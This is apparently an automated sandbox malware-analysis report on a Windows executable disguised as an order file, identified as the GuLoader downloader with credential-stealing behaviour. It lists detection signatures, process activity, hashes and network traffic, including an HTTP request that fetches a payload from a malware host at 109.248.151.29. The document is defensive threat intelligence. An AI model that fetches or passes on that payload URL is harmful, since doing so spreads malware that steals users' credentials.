Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order 00293884800595.bat.exe

Overview

General Information

Sample name:Order 00293884800595.bat.exe
Analysis ID:1465164
MD5:efd3bf2442d368363512548564a51050
SHA1:ca5a3f2750542ea7d6b86f108eb6bff4095f4b16
SHA256:f321c2bed7f29e767bbbf1fb11f6fd64e41e5fe45b3fef084198583a20f9533b
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Initial sample is a PE file and has a suspicious name
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • Order 00293884800595.bat.exe (PID: 9012 cmdline: "C:\Users\user\Desktop\Order 00293884800595.bat.exe" MD5: EFD3BF2442D368363512548564A51050)
    • Order 00293884800595.bat.exe (PID: 8160 cmdline: "C:\Users\user\Desktop\Order 00293884800595.bat.exe" MD5: EFD3BF2442D368363512548564A51050)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000008.00000002.1807122448137.0000000033EF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000005.00000002.1802216811117.0000000005184000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: Order 00293884800595.bat.exe PID: 9012JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
        Process Memory Space: Order 00293884800595.bat.exe PID: 8160JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: Order 00293884800595.bat.exeAvira: detected
          Source: http://109.248.151.29/DttVKmqMztLpGMCsim17.binAvira URL Cloud: Label: malware
          Source: Order 00293884800595.bat.exeReversingLabs: Detection: 13%
          Source: Order 00293884800595.bat.exeVirustotal: Detection: 20%Perma Link
          Source: Order 00293884800595.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.11.30:54358 version: TLS 1.2
          Source: Order 00293884800595.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 5_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_00405A4F
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 5_2_00406620 FindFirstFileA,FindClose,5_2_00406620
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 5_2_004027CF FindFirstFileA,5_2_004027CF
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,8_2_00405A4F
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_00406620 FindFirstFileA,FindClose,8_2_00406620
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_004027CF FindFirstFileA,8_2_004027CF
          Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
          Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownDNS query: name: api.ipify.org
          Source: unknownDNS query: name: api.ipify.org
          Source: unknownDNS query: name: api.ipify.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /DttVKmqMztLpGMCsim17.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 109.248.151.29Cache-Control: no-cache
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /DttVKmqMztLpGMCsim17.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 109.248.151.29Cache-Control: no-cache
          Source: global trafficDNS traffic detected: DNS query: api.ipify.org
          Source: Order 00293884800595.bat.exe, 00000008.00000002.1807110814843.0000000003858000.00000004.00000020.00020000.00000000.sdmp, Order 00293884800595.bat.exe, 00000008.00000002.1807111990869.0000000003BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://109.248.151.29/DttVKmqMztLpGMCsim17.bin
          Source: Order 00293884800595.bat.exe, 00000008.00000002.1807110814843.0000000003858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.248.151.29/DttVKmqMztLpGMCsim17.binu
          Source: Order 00293884800595.bat.exe, 00000008.00000003.1802245749863.00000000364DE000.00000004.00000020.00020000.00000000.sdmp, Order 00293884800595.bat.exe, 00000008.00000002.1807124427166.00000000364EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: Order 00293884800595.bat.exe, 00000008.00000003.1802245749863.00000000364DE000.00000004.00000020.00020000.00000000.sdmp, Order 00293884800595.bat.exe, 00000008.00000002.1807124427166.00000000364EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: Order 00293884800595.bat.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Order 00293884800595.bat.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: Order 00293884800595.bat.exe, 00000008.00000002.1807122448137.0000000033EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Order 00293884800595.bat.exeString found in binary or memory: http://www.skinstudio.netG
          Source: Order 00293884800595.bat.exe, 00000008.00000002.1807122448137.0000000033EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
          Source: Order 00293884800595.bat.exe, 00000008.00000002.1807110814843.00000000038DC000.00000004.00000020.00020000.00000000.sdmp, Order 00293884800595.bat.exe, 00000008.00000002.1807122448137.0000000033EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
          Source: Order 00293884800595.bat.exe, 00000008.00000002.1807122448137.0000000033EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54358
          Source: unknownNetwork traffic detected: HTTP traffic on port 54358 -> 443
          Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.11.30:54358 version: TLS 1.2
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 5_2_0040550F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_0040550F

          System Summary

          barindex
          Source: initial sampleStatic PE information: Filename: Order 00293884800595.bat.exe
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 5_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004033D8
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,8_2_004033D8
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 5_2_004072D15_2_004072D1
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 5_2_00406AFA5_2_00406AFA
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 5_2_6CA51B285_2_6CA51B28
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_004072D18_2_004072D1
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_00406AFA8_2_00406AFA
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_001580B48_2_001580B4
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_001538C88_2_001538C8
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_00158C988_2_00158C98
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_001544E08_2_001544E0
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_0015F5008_2_0015F500
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_0015D08F8_2_0015D08F
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_0015C1008_2_0015C100
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_00153C108_2_00153C10
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_0015E7188_2_0015E718
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_35FB71608_2_35FB7160
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_35FB24F08_2_35FB24F0
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_35FB3C888_2_35FB3C88
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_35FB1B388_2_35FB1B38
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_35FB35A08_2_35FB35A0
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_35FBA2D88_2_35FBA2D8
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: String function: 00402C5E appears 52 times
          Source: Order 00293884800595.bat.exe, 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedissever.exeDVarFileInfo$ vs Order 00293884800595.bat.exe
          Source: Order 00293884800595.bat.exe, 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedissever.exeDVarFileInfo$ vs Order 00293884800595.bat.exe
          Source: Order 00293884800595.bat.exeBinary or memory string: OriginalFilenamedissever.exeDVarFileInfo$ vs Order 00293884800595.bat.exe
          Source: Order 00293884800595.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/17@1/2
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 5_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004033D8
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,8_2_004033D8
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 5_2_004047BF GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,5_2_004047BF
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 5_2_00402198 CoCreateInstance,MultiByteToWideChar,5_2_00402198
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semesJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeMutant created: NULL
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsh4D83.tmpJump to behavior
          Source: Order 00293884800595.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Order 00293884800595.bat.exeReversingLabs: Detection: 13%
          Source: Order 00293884800595.bat.exeVirustotal: Detection: 20%
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile read: C:\Users\user\Desktop\Order 00293884800595.bat.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Order 00293884800595.bat.exe "C:\Users\user\Desktop\Order 00293884800595.bat.exe"
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess created: C:\Users\user\Desktop\Order 00293884800595.bat.exe "C:\Users\user\Desktop\Order 00293884800595.bat.exe"
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess created: C:\Users\user\Desktop\Order 00293884800595.bat.exe "C:\Users\user\Desktop\Order 00293884800595.bat.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
          Source: Order 00293884800595.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Source: Yara matchFile source: Process Memory Space: Order 00293884800595.bat.exe PID: 9012, type: MEMORYSTR
          Source: Yara matchFile source: 00000005.00000002.1802216811117.0000000005184000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 5_2_6CA51B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,5_2_6CA51B28
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_00150C45 push ebx; retf 8_2_00150C52
